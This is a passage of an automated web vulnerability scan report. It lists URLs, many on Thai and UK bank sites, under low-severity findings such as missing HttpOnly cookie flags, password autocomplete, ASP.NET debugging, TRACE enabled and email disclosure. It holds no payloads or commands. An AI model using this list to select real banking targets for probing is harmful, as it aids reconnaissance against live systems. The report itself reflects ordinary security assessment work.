15.27. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cricket/13264093.stm

15.28. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/13265403.stm

15.29. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/formula_one/13267766.stm

15.30. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm

15.31. http://news.bbc.co.uk/sport2/hi/football/13265403.stm

15.32. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm

15.33. http://onlinehelp.microsoft.com/en-US/bing/ff808506.aspx

15.34. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx

15.35. http://picasaweb.google.com/lh/view

15.36. http://pixel.33across.com/ps/

15.37. http://th.linkedin.com/in/narongchai

15.38. http://translate.google.com/translate

15.39. http://translate.google.com/translate_t

15.40. http://video.google.com/videoplay

15.41. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp

15.42. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp

15.43. http://www.bangkokpost.com/forum/viewtopic.php

15.44. http://www.coolthaihouse.com/forum/viewtopic.php

15.45. http://www.facebook.com/campaign/landing.php

15.46. http://www.facebook.com/pages/KTB-Care/178373518915

15.47. http://www.google.com/finance

15.48. http://www.multimap.com/clients/places.cgi

15.49. http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php

15.50. http://www.scriptlogic.com/

15.51. http://www.scriptlogic.com/int/am/prodsel/050709

15.52. http://www.scriptlogic.com/sem/g/content/pt-wireless/070610

15.53. http://www.youtube.com/results

15.54. http://www.youtube.com/watch

15.55. http://www2.itt-tech.edu/it/d/

15.56. http://www22.glam.com/cTagsImg.act

15.57. http://xcdn.xgraph.net/15530/db/xg.gif

16. Cookie without HttpOnly flag set

16.1. https://csc.scb.co.th/webclient1/bcm_signin.jsp

16.2. https://csc.scb.co.th/webclient1/cllcntr_en.jsp

16.3. https://csc.scb.co.th/webclient1/index.jsp

16.4. http://dev.piwik.org/trac/browser/trunk/js/piwik.js

16.5. https://dimenxion.bangkokbank.com/bonprd/jsp/common/loginfiles/es.jsp

16.6. http://group.barclays.com/Citizenship/Community-Investment

16.7. http://group.barclays.com/Home

16.8. http://group.barclays.com/Sitemap

16.9. http://group.barclays.com/What-we-do/Sponsorship/Community-sponsorship

16.10. http://group.barclays.com/cs/Satellite

16.11. http://group.barclays.com/favicon.ico

16.12. https://ibank.barclays.co.uk/olb/w/LoginMember.do

16.13. https://icustody.bangkokbank.com/Signon.aspx

16.14. https://ifunds.bangkokbank.com/Login.aspx

16.15. https://kcustodian.kasikornbank.com/KCustodian/

16.16. http://m1645.ic-live.com/515/

16.17. http://marketdata.set.or.th/mkt/topten.do

16.18. http://moneytalk.scb.co.th/

16.19. http://moneytalk.scb.co.th/

16.20. http://moneytalk.scb.co.th/index.asp

16.21. http://moneytalk.scb.co.th/index.asp

16.22. https://online.kasikornbankgroup.com/K-Online/ib/login_en.jsp

16.23. https://online.kasikornbankgroup.com/K-Online/ksec/K-CyberTrade-login.jsp

16.24. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

16.25. http://plugins.jquery.com/node/1208]

16.26. http://plugins.jquery.com/project/onImagesLoad

16.27. http://register2.set.or.th/semreg/detail.aspx

16.28. http://scb.dev-orisma.com/en/friends-of-scb

16.29. http://seal.controlcase.com/

16.30. http://th.linkedin.com/in/narongchai

16.31. http://trends.atipat.co.cc/thailand-breast-slap/x22

16.32. http://weblink.settrade.com/banner/banner3.jsp

16.33. http://wikipediareview.com/index.php

16.34. http://www.360travelguide.com/results.asp

16.35. http://www.bangkokbank.com/_layouts/NR/BangkokBankWebApps/Email%20Registration/subscribe.asp

16.36. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp

16.37. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp

16.38. http://www.bangkokbank.com/_layouts/nr/AccountAccess/account.asp

16.39. http://www.bangkokbank.com/_layouts/nr/BangkokBankWebApps/BLSresearch/MainBLS.asp

16.40. http://www.bangkokbank.com/_layouts/nr/BangkokBankWebApps/BLSresearch/MainBLS.asp

16.41. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp

16.42. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp

16.43. https://www.barclays-home-insurance.co.uk/p4/Barclays/Home/Assumptions.aspx

16.44. https://www.barclays-home-insurance.co.uk/p4/barclays/SaveRetrieve/Saveandretrieveloginpage.aspx

16.45. http://www.barclays.co.uk/Currentaccounts/P1242557963414

16.46. http://www.barclays.co.uk/Insurance/Homeinsurance/BuildingsandContentsInsurance/P1242557976121

16.47. http://www.barclays.co.uk/Insurance/P1242557963438

16.48. http://www.barclays.co.uk/Loans/P1242557963420

16.49. http://www.barclays.co.uk/Mortgages/P1242557963476

16.50. http://www.barclays.co.uk/PersonalBanking/P1242557947640

16.51. http://www.barclays.co.uk/Savings/ISAs/H1242557860616

16.52. http://www.barclays.co.uk/cs/Satellite

16.53. https://www.bizpayment.ktb.co.th/epayview/

16.54. http://www.business.barclays.co.uk/BRC1/jsp/brccontrol

16.55. http://www.controlcase.com/contact.php

16.56. http://www.controlcase.com/logon_page.php

16.57. http://www.independent.co.uk/news/world/asia/x26amp

16.58. http://www.independent.co.uk/news/world/x26amp

16.59. http://www.independent.co.uk/news/x26amp

16.60. http://www.khonkaen.com/english/forum/default.asp

16.61. http://www.khonkaen.com/english/forum/forum_posts.asp

16.62. http://www.khonkaen.com/english/forum/forum_topics.asp

16.63. http://www.ktam.co.th/en/index.php

16.64. http://www.ktb.co.th/en/main/

16.65. https://www.ktb.co.th/internetservice/onlineAccountAction.do

16.66. https://www.ktbonline.ktb.co.th/new/

16.67. http://www.mindworkscorp.com/

16.68. http://www.personal.barclays.co.uk/BRC1/jsp/brccontrol

16.69. http://www.scb.co.th/en/home

16.70. http://www.scb.co.th/en/home/

16.71. http://www.scb.co.th/scb_api/scbapi.jsp

16.72. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser

16.73. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/download

16.74. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/information

16.75. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/logon_th

16.76. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/securetip

16.77. http://www.scbeasy.com/

16.78. http://www.scriptlogic.com/sem/g/content/pt-wireless/070610

16.79. http://www.set.or.th/set/oppdaybyperiod.do

16.80. http://www.thailandhotelforums.com/forum/index.php

16.81. http://18.xg4ken.com/media/redir.php

16.82. http://419.myfunforum.org/sutra724.php/x22

16.83. http://a.unanimis.co.uk/fc.php

16.84. http://ad.yieldmanager.com/pixel

16.85. https://adwords.google.com/select/Login

16.86. https://adwords.google.com/um/StartNewLogin

16.87. http://answers.yahoo.com/dir/index

16.88. http://answers.yahoo.com/question/index

16.89. http://apps.barclays.co.uk/accessibility/

16.90. http://b.scorecardresearch.com/b

16.91. http://banner2.set.or.th/www/delivery/afr.php

16.92. http://banner2.set.or.th/www/delivery/afr.php

16.93. http://banner2.set.or.th/www/delivery/ck.php

16.94. http://banner2.set.or.th/www/delivery/lg.php

16.95. https://center.ktam.co.th/

16.96. http://cspix.media6degrees.com/orbserv/hbpix

16.97. http://dis.us.criteo.com/dis/dis.aspx

16.98. http://domdex.com/f

16.99. http://ds.addthis.com/red/psi/sites/www.set.or.th/p.json

16.100. https://ebank.kasikornbankgroup.com/kbiznet/login.html

16.101. http://edge.aperture.displaymarketplace.com/displayscript.js

16.102. https://feedback.live.com/default.aspx

16.103. http://get.adobe.com/flashplayer/

16.104. http://goto.ext.google.com/og-dogfood-issue

16.105. http://goto.ext.google.com/og-exp

16.106. http://html.aggregateknowledge.com/iframe

16.107. https://ibank.barclays.co.uk/

16.108. http://in.getclicky.com/in.php

16.109. http://ktbcare.hi5.com/

16.110. http://leadback.advertising.com/adcedge/lb

16.111. http://lvs.truehits.in.th/goggen.php

16.112. http://metrics.seenon.com/b/ss/delagentnbc,delagentglobalrollup/1/H.17/s25651625484430

16.113. http://news.bbc.co.uk/2/hi/help/rss/4498287.stm

16.114. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm

16.115. http://news.bbc.co.uk/go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm

16.116. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cricket/13264093.stm

16.117. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/13265403.stm

16.118. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/formula_one/13267766.stm

16.119. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm

16.120. http://news.bbc.co.uk/sport2/hi/football/13265403.stm

16.121. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm

16.122. http://onlinehelp.microsoft.com/en-US/bing/ff808506.aspx

16.123. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx

16.124. http://pixel.33across.com/ps/

16.125. http://propertyforsale.kasikornbank.com/PropertyForSaleAnnouncement/1,2098,,00.html

16.126. http://scriptlogiccorp.d2.sc.omtrdc.net/b/ss/slcproduction/1/H.22.1/s27267301290655

16.127. http://sdc.bot.or.th/dcsw4pwnjm3f3ymhgt6lphzp1_5v7q/dcs.gif

16.128. http://sdc.bot.or.th/dcsw4pwnjm3f3ymhgt6lphzp1_5v7q/dcs.gif

16.129. http://statse.webtrendslive.com/dcsbkflpo00000kz4nrnh3kyv_9q5r/dcs.gif

16.130. http://statse.webtrendslive.com/dcssxcr8i00000stlemt7jpvp_8c9t/dcs.gif

16.131. http://tc.barclays.co.uk/Creditcards/P1242557963445

16.132. http://tc.barclays.co.uk/CurrentAccounts/Moreforyourmoney/AdditionsActive/P1242557963802

16.133. http://tc.barclays.co.uk/CurrentAccounts/Moreforyourmoney/CurrentAccountPlus/P1242557963790

16.134. http://tc.barclays.co.uk/Currentaccounts/P1242557963414

16.135. http://tc.barclays.co.uk/InfoBank/PersonalReserve/P1242557963784

16.136. http://tc.barclays.co.uk/Insurance/Carinsurance/Carinsurance/P1242557964058

16.137. http://tc.barclays.co.uk/Insurance/Homeinsurance/FinerHighValueHomeInsurance/P1242557964022

16.138. http://tc.barclays.co.uk/Insurance/IncomeInsurance/BarclaysIncomeInsurance/P1242570870016

16.139. http://tc.barclays.co.uk/Insurance/LifeInsurance/LifeInsurancefromAviva/P1242557963444

16.140. http://tc.barclays.co.uk/Insurance/P1242557963438

16.141. http://tc.barclays.co.uk/Loans/Ourloans/Personalloans/P1242557963928

16.142. http://tc.barclays.co.uk/Loans/P1242557963420

16.143. http://tc.barclays.co.uk/Mortgages/Fixedratemortgages/P1242557963470

16.144. http://tc.barclays.co.uk/PremierHomePage/P1242557952563

16.145. http://tc.barclays.co.uk/Savings/Comparesavingsaccounts/P1242564257686

16.146. http://tc.barclays.co.uk/Savings/FixedRateBonds/H1242557860616

16.147. http://tc.barclays.co.uk/Savings/ISAs/H1242557860616

16.148. http://tc.barclays.co.uk/Savings/P1242557963426

16.149. http://tc.barclays.co.uk/c

16.150. http://tc.barclays.co.uk/i

16.151. http://translate.google.com/translate

16.152. http://translate.google.com/translate_t

16.153. http://twitter.com/KBank_Live

16.154. http://twitter.com/ktb_care

16.155. http://twitter.com/scb_thailand

16.156. http://video.google.com/videoplay

16.157. http://webmail.aol.com/

16.158. http://www.barclays.com/privacy/com_privacy.html

16.159. https://www.bizpayment.ktb.co.th/epayview

16.160. http://www.facebook.com/pages/KTB-Care/178373518915

16.161. http://www.google.com/finance

16.162. https://www.google.com/accounts/Login

16.163. https://www.google.com/accounts/ServiceLogin

16.164. http://www.googleadservices.com/pagead/aclk

16.165. http://www.googleadservices.com/pagead/conversion/1005090170/

16.166. http://www.googleadservices.com/pagead/conversion/1032234781/

16.167. http://www.multimap.com/clients/places.cgi

16.168. http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php

16.169. https://www.newcb.ktb.co.th/

16.170. http://www.scriptlogic.com/

16.171. http://www.scriptlogic.com/int/am/prodsel/050709

16.172. http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp

16.173. http://www.yestheyrefake.net/vb/forumdisplay.php

16.174. http://www.yestheyrefake.net/vb/showthread.php

16.175. http://www.youtube.com/results

16.176. http://www.youtube.com/watch

16.177. http://www.zlmc.org/mindfulness-meditation.html

16.178. http://www2.itt-tech.edu/it/d/

16.179. http://www22.glam.com/cTagsImg.act

16.180. http://xcdn.xgraph.net/15530/db/xg.gif

17. Password field with autocomplete enabled

17.1. http://dl.scriptlogic.com/login/Combined.aspx

17.2. http://home.controlcase.com/piwik/

17.3. https://home.controlcase.com/piwik/

17.4. https://online.kasikornbankgroup.com/K-Online/ksec/K-CyberTrade-login.jsp

17.5. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

17.6. http://th.linkedin.com/in/narongchai

17.7. http://truehits.net/

17.8. http://truehits.net/stat.php

17.9. http://twitter.com/KBank_Live

17.10. http://twitter.com/ktb_care

17.11. http://twitter.com/scb_thailand

17.12. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London

17.13. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London

17.14. http://wikipediareview.com/index.php

17.15. http://wikipediareview.com/index.php

17.16. https://www.barclaysfantasyfundmanager.co.uk/

17.17. https://www.bizpayment.ktb.co.th/epayview/

17.18. http://www.controlcase.com/change_password.php

17.19. http://www.controlcase.com/logon_page.php

17.20. http://www.facebook.com/pages/KTB-Care/178373518915

17.21. https://www.google.com/accounts/Login

17.22. https://www.google.com/accounts/ServiceLogin

17.23. http://www.khonkaen.com/english/forum/default.asp

17.24. https://www.ktamsmarttrade.com/FrontWeb/Home/Login.aspx

17.25. http://www.newsroom.barclays.com/webuser/newsextra.aspx

17.26. http://www.newsroom.barclays.com/webuser/register.aspx

17.27. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser

17.28. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/download

17.29. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/information

17.30. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/logon_th

17.31. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/securetip

17.32. http://www.thailandhotelforums.com/forum/index.php

17.33. http://www.thailandhotelforums.com/forum/index.php

17.34. http://www.yestheyrefake.net/vb/forumdisplay.php

17.35. http://www.yestheyrefake.net/vb/showthread.php

18. Source code disclosure

18.1. http://www.ktb.co.th/flash/a2.swf

18.2. http://www.ktb.co.th/flash/a3.swf

18.3. http://www.ktb.co.th/flash/c3.swf

18.4. http://www.ktb.co.th/flash/d2.swf

18.5. http://www.ktb.co.th/flash/d3.swf

18.6. http://www.ktb.co.th/flash/e3.swf

18.7. http://www.ktb.co.th/flash/f2.swf

18.8. http://www.ktb.co.th/flash/home_show_flash2.swf

18.9. http://www.ktb.co.th/flash/ktb_group_eng.swf

19. ASP.NET debugging enabled

19.1. http://dl.scriptlogic.com/Default.aspx

19.2. http://register2.set.or.th/Default.aspx

19.3. http://www.bot.or.th/Default.aspx

19.4. https://www.ktamsmarttrade.com/Default.aspx

20. Referer-dependent response

20.1. http://weblink.settrade.com/banner/banner3.jsp

20.2. http://www.facebook.com/plugins/like.php

20.3. http://www.scriptlogic.com/sem/g/content/pt-wireless/070610

20.4. http://www2.itt-tech.edu/it/d/

21. Cross-domain POST

21.1. http://jscrollpane.kelvinluck.com/

21.2. http://webcache.googleusercontent.com/search

21.3. http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp

22. Cross-domain Referer leakage

22.1. http://0.r.msn.com/

22.2. http://318395.r.msn.com/

22.3. http://914188.r.msn.com/

22.4. http://ad.doubleclick.net/adi/agt.nbcuni/homepage

22.5. http://ad.doubleclick.net/adi/agt.nbcuni/homepage

22.6. http://ad.doubleclick.net/adi/agt.nbcuni/homepage

22.7. http://ad.doubleclick.net/adi/agt.nbcuni/homepage

22.8. http://answers.yahoo.com/dir/index

22.9. http://answers.yahoo.com/question/index

22.10. http://dl.scriptlogic.com/login/Combined.aspx

22.11. http://get.adobe.com/flashplayer/

22.12. http://googleads.g.doubleclick.net/pagead/ads

22.13. http://googleads.g.doubleclick.net/pagead/ads

22.14. http://googleads.g.doubleclick.net/pagead/ads

22.15. http://googleads.g.doubleclick.net/pagead/ads

22.16. http://googleads.g.doubleclick.net/pagead/ads

22.17. http://marketdata.set.or.th/mkt/topten.do

22.18. http://moneytalk.scb.co.th/index.asp

22.19. http://news.google.com/news/story

22.20. http://picasaweb.google.com/lh/view

22.21. http://picasaweb.google.com/lh/view

22.22. http://rtradeinfo.bualuang.co.th/tradinginfo.services/price_update.php

22.23. http://translate.google.com/translate_t

22.24. http://translate.google.com/translate_t

22.25. http://truehits.net/stat.php

22.26. http://webcache.googleusercontent.com/search

22.27. http://webcache.googleusercontent.com/search

22.28. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp

22.29. http://www.barclays.co.uk/Savings/ISAs/H1242557860616

22.30. http://www.facebook.com/plugins/like.php

22.31. http://www.facebook.com/plugins/like.php

22.32. http://www.google.com/recaptcha/api/js/recaptcha_ajax.js

22.33. http://www.google.com/search

22.34. http://www.google.com/search

22.35. http://www.google.com/search

22.36. http://www.google.com/search

22.37. http://www.google.com/url

22.38. http://www.google.com/url

22.39. http://www.googleadservices.com/pagead/conversion/1032234781/

22.40. http://www.kasikornbank.com/Pages/truehitsstat.html

22.41. http://www.ktam.co.th/media_box.php

22.42. http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php

22.43. http://www.newsroom.barclays.com/content/Detail.aspx

22.44. http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp

22.45. http://www.sedoparking.com/search/registrar.php

22.46. http://www.set.or.th/set/oppdaybyperiod.do

22.47. http://www.zlmc.org/mindfulness-meditation.html

22.48. http://www2.itt-tech.edu/it/d/

23. Cross-domain script include

23.1. http://adomas.org/javascript-mouse-wheel/

23.2. http://answers.yahoo.com/dir/index

23.3. http://answers.yahoo.com/dir/index

23.4. http://answers.yahoo.com/question/index

23.5. https://apps.barclays.co.uk/webchat/invite_accept.jpg/u0022

23.6. https://apps.barclays.co.uk/webchat/invite_background.jpg/u0022

23.7. https://apps.barclays.co.uk/webchat/invite_decline_bottom.jpg/u0022

23.8. http://de.wikipedia.org/wiki/Liste_der_Banken_in_Thailand

23.9. http://dl.scriptlogic.com/login/Combined.aspx

23.10. http://docs.jquery.com/UI

23.11. http://docs.jquery.com/UI/Accordion

23.12. http://docs.jquery.com/UI/Button

23.13. http://docs.jquery.com/UI/Effects/

23.14. http://docs.jquery.com/UI/Effects/Slide

23.15. http://docs.jquery.com/UI/Mouse

23.16. http://docs.jquery.com/UI/Slider

23.17. http://docs.jquery.com/UI/Widget

23.18. http://en.wikipedia.org/wiki/List_of_banks_in_Thailand

23.19. http://googleads.g.doubleclick.net/pagead/ads

23.20. http://group.barclays.com/Citizenship/Community-Investment

23.21. http://group.barclays.com/What-we-do/Sponsorship/Community-sponsorship

23.22. http://group.barclays.com/favicon.ico

23.23. http://img.sedoparking.com/jspartner/google.js

23.24. http://ipinfusion.com/js/header.js

23.25. http://ja.wikipedia.org/wiki/????????覧

23.26. http://javascript.nwbox.com/IEContentLoaded/

23.27. http://jquery.com/

23.28. http://jqueryui.com/about

23.29. http://jscrollpane.kelvinluck.com/

23.30. http://marketdata.set.or.th/mkt/topten.do

23.31. http://marketdata.set.or.th/search.html

23.32. http://nerdbots.com/services.html

23.33. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm

23.34. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm

23.35. http://news.bbc.co.uk/sport2/hi/football/13265403.stm

23.36. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm

23.37. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

23.38. http://picasaweb.google.com/lh/view

23.39. http://randomfactsthailand.com/thailand-breast-slap-sudden-breast-growth-without-surgery/x22

23.40. http://sorgalla.com/

23.41. http://sorgalla.com/jcarousel/

23.42. http://th.wikipedia.org/wiki/ราย?ื?อ??า?าร???ระ??ศ??ย

23.43. http://translatewiki.net/wiki/MediaWiki:Collapsible-collapse/en

23.44. http://translatewiki.net/wiki/MediaWiki:Collapsible-expand/en

23.45. http://trends.atipat.co.cc/thailand-breast-slap/x22

23.46. http://truehits.net/

23.47. http://truehits.net/stat.php

23.48. http://tv.popcrunch.com/snl-commercials-barkleys-bank-peepers-insurance-video/

23.49. http://twitter.com/KBank_Live

23.50. http://twitter.com/ktb_care

23.51. http://twitter.com/scb_thailand

23.52. http://webcache.googleusercontent.com/search

23.53. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London

23.54. http://wikimediafoundation.org/wiki/Privacy_policy

23.55. http://wikimediafoundation.org/wiki/Terms_of_Use

23.56. http://wuu.wikipedia.org/wiki/泰???

23.57. http://www.360travelguide.com/results.asp

23.58. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp

23.59. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp

23.60. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp

23.61. http://www.bangkokpost.com/forum/viewtopic.php

23.62. https://www.barclays-home-insurance.co.uk/p4/Barclays/Home/Assumptions.aspx

23.63. http://www.barclaysannualreports.com/ar2010/index.asp

23.64. http://www.bot.or.th/english/Pages/BOTDefault.aspx

23.65. http://www.coolthaihouse.com/forum/viewtopic.php

23.66. http://www.facebook.com/pages/KTB-Care/178373518915

23.67. http://www.facebook.com/plugins/like.php

23.68. http://www.independent.co.uk/news/world/asia/x26amp

23.69. http://www.independent.co.uk/news/world/x26amp

23.70. http://www.independent.co.uk/news/x26amp

23.71. http://www.kasikornbank.com/Pages/truehitsstat.html

23.72. http://www.khonkaen.com/english/forum/default.asp

23.73. http://www.ktb.co.th/en/ktb_group/main.jsp

23.74. http://www.ktb.co.th/en/main/

23.75. http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php

23.76. http://www.newsroom.barclays.com/content/Detail.aspx

23.77. http://www.scb.co.th/en/home

23.78. http://www.scb.co.th/en/home/

23.79. http://www.scriptlogic.com/

23.80. http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp

23.81. http://www.sedoparking.com/search/registrar.php

23.82. http://www.set.or.th/en/contact/contact.html

23.83. http://www.set.or.th/en/index.html

23.84. http://www.set.or.th/en/news/issuer_activities/ipo_showcase/set_ipo_showcase_p1.html

23.85. http://www.set.or.th/en/products/index/setindex_p1.html

23.86. http://www.set.or.th/en/regulations/cg/roles_p1.html

23.87. http://www.set.or.th/en/sitemap/for_listing.html

23.88. http://www.set.or.th/nicepage_404.html

23.89. http://www.set.or.th/search.html

23.90. http://www.set.or.th/set/oppdaybyperiod.do

23.91. http://www.set.or.th/th/index.html

23.92. http://www.thailandhotelforums.com/forum/index.php

23.93. http://www.youtube.com/results

23.94. http://www2.itt-tech.edu/it/d/

24. File upload functionality

25. TRACE method is enabled

25.1. http://18.xg4ken.com/

25.2. http://2-thai.com/

25.3. http://a.unanimis.co.uk/

25.4. http://de.wikipedia.org/

25.5. http://en.wikipedia.org/

25.6. http://formlessnetworking.com/

25.7. http://home.controlcase.com/

25.8. https://home.controlcase.com/

25.9. http://ipinfusion.com/

25.10. http://ja.wikipedia.org/

25.11. http://javascript.nwbox.com/

25.12. http://jquery.com/

25.13. http://jquery.org/

25.14. https://ksupplychain.kasikornbank.com/

25.15. http://meta.wikimedia.org/

25.16. http://metrics.seenon.com/

25.17. http://mls.marchex.com/

25.18. https://online.kasikornbankgroup.com/

25.19. http://picasaweb.google.com/

25.20. http://piwik.org/

25.21. http://plugins.jquery.com/

25.22. http://register2.set.or.th/

25.23. http://rtradeinfo.bualuang.co.th/

25.24. http://scriptlogiccorp.d2.sc.omtrdc.net/

25.25. https://secure.wikimedia.org/

25.26. http://sizzlejs.com/

25.27. http://th.wikipedia.org/

25.28. http://thailandforvisitors.com/

25.29. http://trends.atipat.co.cc/

25.30. http://validator.w3.org/

25.31. http://wiki.answers.com/

25.32. http://wikimediafoundation.org/

25.33. http://wuu.wikipedia.org/

25.34. http://www.1day1year.com/

25.35. http://www.bangkokpost.com/

25.36. http://www.coolthaihouse.com/

25.37. http://www.formlessnetworking.com/

25.38. http://www.ktam.co.th/

25.39. http://www.thailandguru.com/

25.40. http://www.thailandhotelforums.com/

25.41. http://www2.itt-tech.edu/

26. Email addresses disclosed

26.1. http://419.myfunforum.org/sutra724.php/x22

26.2. http://adomas.org/javascript-mouse-wheel/

26.3. http://en.wikipedia.org/w/index.php

26.4. http://investors.fiserv.com/releasedetail.cfm

26.5. http://jqueryui.com/about

26.6. http://marketdata.set.or.th/scripts/JSCookMenu.js

26.7. http://moneytalk.scb.co.th/Scripts/jquery.mousewheel.js

26.8. http://nerdbots.com/contact.aspx

26.9. https://online.kasikornbankgroup.com/K-Online/ksec/K-CyberTrade-login.jsp

26.10. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

26.11. http://register2.set.or.th/styles/calendar/popBirthdate.js

26.12. http://truehits.net/stat.php

26.13. http://twitter.com/KBank_Live

26.14. http://validator.w3.org/check

26.15. http://www.bangkokbank.com/_layouts/NR/JavaScript/CommonClient.js

26.16. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp

26.17. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp

26.18. http://www.bangkokpost.com/forum/viewtopic.php

26.19. http://www.bot.or.th/english/Pages/BOTDefault.aspx

26.20. https://www.google.com/accounts/Login

26.21. https://www.google.com/accounts/ServiceLogin

26.22. http://www.independent.co.uk/news/world/asia/x26amp

26.23. http://www.independent.co.uk/news/world/x26amp

26.24. http://www.independent.co.uk/news/x26amp

26.25. http://www.ktam.co.th/en/alliance.php

26.26. http://www.ktam.co.th/en/index.php

26.27. http://www.ktam.co.th/en/index.php/a

26.28. http://www.ktam.co.th/en/index.php/declarationnav.php

26.29. http://www.ktam.co.th/en/index.php/ims/ads_csi300_2.gif

26.30. http://www.ktam.co.th/en/index.php/ims/b_ktam_news11.gif

26.31. http://www.ktam.co.th/en/index.php/ims/b_ktam_news12.gif

26.32. http://www.ktam.co.th/en/index.php/ims/b_ktam_news13.gif

26.33. http://www.ktam.co.th/en/index.php/ims/b_ktam_news21.gif

26.34. http://www.ktam.co.th/en/index.php/ims/b_ktam_news22.gif

26.35. http://www.ktam.co.th/en/index.php/ims/b_ktam_news23.gif

26.36. http://www.ktam.co.th/en/index.php/ims/b_nav11.gif

26.37. http://www.ktam.co.th/en/index.php/ims/b_nav12.gif

26.38. http://www.ktam.co.th/en/index.php/ims/b_nav13.gif

26.39. http://www.ktam.co.th/en/index.php/ims/b_nav21.gif

26.40. http://www.ktam.co.th/en/index.php/ims/b_nav22.gif

26.41. http://www.ktam.co.th/en/index.php/ims/b_nav23.gif

26.42. http://www.ktam.co.th/en/index.php/ims/bg_cr1.gif

26.43. http://www.ktam.co.th/en/index.php/ims/bg_head1.gif

26.44. http://www.ktam.co.th/en/index.php/ims/bg_mmenu01.gif

26.45. http://www.ktam.co.th/en/index.php/ims/bg_mmenu02.gif

26.46. http://www.ktam.co.th/en/index.php/ims/bg_search1.gif

26.47. http://www.ktam.co.th/en/index.php/ims/bt_about1.gif

26.48. http://www.ktam.co.th/en/index.php/ims/bt_agent1.gif

26.49. http://www.ktam.co.th/en/index.php/ims/bt_education_center1.gif

26.50. http://www.ktam.co.th/en/index.php/ims/bt_home2.gif

26.51. http://www.ktam.co.th/en/index.php/ims/bt_news1.gif

26.52. http://www.ktam.co.th/en/index.php/ims/bt_service1.gif

26.53. http://www.ktam.co.th/en/index.php/ims/cmd_search1.gif

26.54. http://www.ktam.co.th/en/index.php/ims/empty.gif

26.55. http://www.ktam.co.th/en/index.php/ims/h_download1.gif

26.56. http://www.ktam.co.th/en/index.php/ims/h_link1.gif

26.57. http://www.ktam.co.th/en/index.php/ims/i_acrobat.gif

26.58. http://www.ktam.co.th/en/index.php/ims/i_firefox.gif

26.59. http://www.ktam.co.th/en/index.php/ims/i_flash.gif

26.60. http://www.ktam.co.th/en/index.php/ims/i_winmedia.gif

26.61. http://www.ktam.co.th/en/index.php/ims/mails.png

26.62. http://www.ktam.co.th/en/index.php/ims/news.php

26.63. http://www.ktam.co.th/en/index.php/ims/p_flag_th.gif

26.64. http://www.ktam.co.th/en/index.php/ims/p_ktamnew.gif

26.65. http://www.ktam.co.th/en/index.php/ims/p_ktamonline.gif

26.66. http://www.ktam.co.th/en/index.php/ims/p_line001.gif

26.67. http://www.ktam.co.th/en/index.php/ims/p_line002.gif

26.68. http://www.ktam.co.th/en/index.php/ims/p_link01.gif

26.69. http://www.ktam.co.th/en/index.php/ims/p_link02.gif

26.70. http://www.ktam.co.th/en/index.php/ims/p_link03.gif

26.71. http://www.ktam.co.th/en/index.php/ims/p_link04.gif

26.72. http://www.ktam.co.th/en/index.php/ims/p_link05.gif

26.73. http://www.ktam.co.th/en/index.php/ims/p_link06.gif

26.74. http://www.ktam.co.th/en/index.php/ims/p_logo1.gif

26.75. http://www.ktam.co.th/en/index.php/ims/p_word1.gif

26.76. http://www.ktam.co.th/en/index.php/media_box.php

26.77. http://www.ktam.co.th/en/index.php/news.inc.php

26.78. http://www.ktam.co.th/en/index.php/news.php

26.79. http://www.ktam.co.th/en/index.php/self_discovery.php

26.80. http://www.ktam.co.th/en/index.php/style/news.php

26.81. http://www.ktam.co.th/en/index.php/style/page.txt

26.82. http://www.ktam.co.th/en/news.php

26.83. http://www.ktam.co.th/th/news.php

26.84. http://www.ktb.co.th/css/master.css

